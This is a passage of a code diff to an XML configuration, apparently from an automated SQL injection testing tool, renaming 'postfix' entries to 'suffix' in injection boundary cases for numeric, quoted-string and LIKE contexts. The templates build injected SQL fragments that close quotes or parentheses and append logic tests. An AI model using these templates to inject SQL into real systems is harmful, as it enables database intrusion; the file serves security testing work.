<negative format="%s%s%s %s %s%d=%d %s" params="value, prefix, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt + 1, postfix"/>
|
<negative format="%s%s%s %s %s%d=%d %s" params="value, prefix, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt + 1, suffix"/>
|
||||||
</test>
|
</test>
|
||||||
<usage>
|
<usage>
|
||||||
<prefix format="%s " params="')' * parenthesis"/>
|
<prefix format="%s " params="')' * parenthesis"/>
|
||||||
<postfix format=" %s %s" params="logic, '(' * parenthesis"/>
|
<suffix format=" %s %s" params="logic, '(' * parenthesis"/>
|
||||||
</usage>
|
</usage>
|
||||||
</case>
|
</case>
|
||||||
<case name="numeric" desc="unescaped numeric">
|
<case name="numeric" desc="unescaped numeric">
|
||||||
|
@ -18,7 +18,7 @@
|
||||||
</test>
|
</test>
|
||||||
<usage>
|
<usage>
|
||||||
<prefix format="%s " params="')' * parenthesis"/>
|
<prefix format="%s " params="')' * parenthesis"/>
|
||||||
<postfix format=" %s %s%d=%d" params="logic, '(' * parenthesis, randInt, randInt"/>
|
<suffix format=" %s %s%d=%d" params="logic, '(' * parenthesis, randInt, randInt"/>
|
||||||
</usage>
|
</usage>
|
||||||
</case>
|
</case>
|
||||||
<case name="stringsingle" desc="single quoted string">
|
<case name="stringsingle" desc="single quoted string">
|
||||||
|
@ -28,7 +28,7 @@
|
||||||
</test>
|
</test>
|
||||||
<usage>
|
<usage>
|
||||||
<prefix format="'%s " params="')' * parenthesis"/>
|
<prefix format="'%s " params="')' * parenthesis"/>
|
||||||
<postfix format=" %s %s'%s'='%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
<suffix format=" %s %s'%s'='%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||||
</usage>
|
</usage>
|
||||||
</case>
|
</case>
|
||||||
<case name="likesingle" desc="LIKE single quoted string">
|
<case name="likesingle" desc="LIKE single quoted string">
|
||||||
|
@ -38,7 +38,7 @@
|
||||||
</test>
|
</test>
|
||||||
<usage>
|
<usage>
|
||||||
<prefix format="'%s " params="')' * parenthesis"/>
|
<prefix format="'%s " params="')' * parenthesis"/>
|
||||||
<postfix format=" %s %s'%s' LIKE '%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
<suffix format=" %s %s'%s' LIKE '%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||||
</usage>
|
</usage>
|
||||||
</case>
|
</case>
|
||||||
<case name="stringdouble" desc="double quoted string">
|
<case name="stringdouble" desc="double quoted string">
|
||||||
|
@ -48,7 +48,7 @@
|
||||||
</test>
|
</test>
|
||||||
<usage>
|
<usage>
|
||||||
<prefix format=""%s " params="')' * parenthesis"/>
|
<prefix format=""%s " params="')' * parenthesis"/>
|
||||||
<postfix format=" %s %s"%s"="%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
<suffix format=" %s %s"%s"="%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||||
</usage>
|
</usage>
|
||||||
</case>
|
</case>
|
||||||
<case name="likedouble" desc="LIKE double quoted string">
|
<case name="likedouble" desc="LIKE double quoted string">
|
||||||
|
@ -58,7 +58,7 @@
|
||||||
</test>
|
</test>
|
||||||
<usage>
|
<usage>
|
||||||
<prefix format=""%s " params="')' * parenthesis"/>
|
<prefix format=""%s " params="')' * parenthesis"/>
|
||||||
<postfix format=" %s %s"%s" LIKE "%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
<suffix format=" %s %s"%s" LIKE "%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||||
</usage>
|
</usage>
|
||||||
</case>
|
</case>
|
||||||
</root>
|
</root>
|
||||||
|
|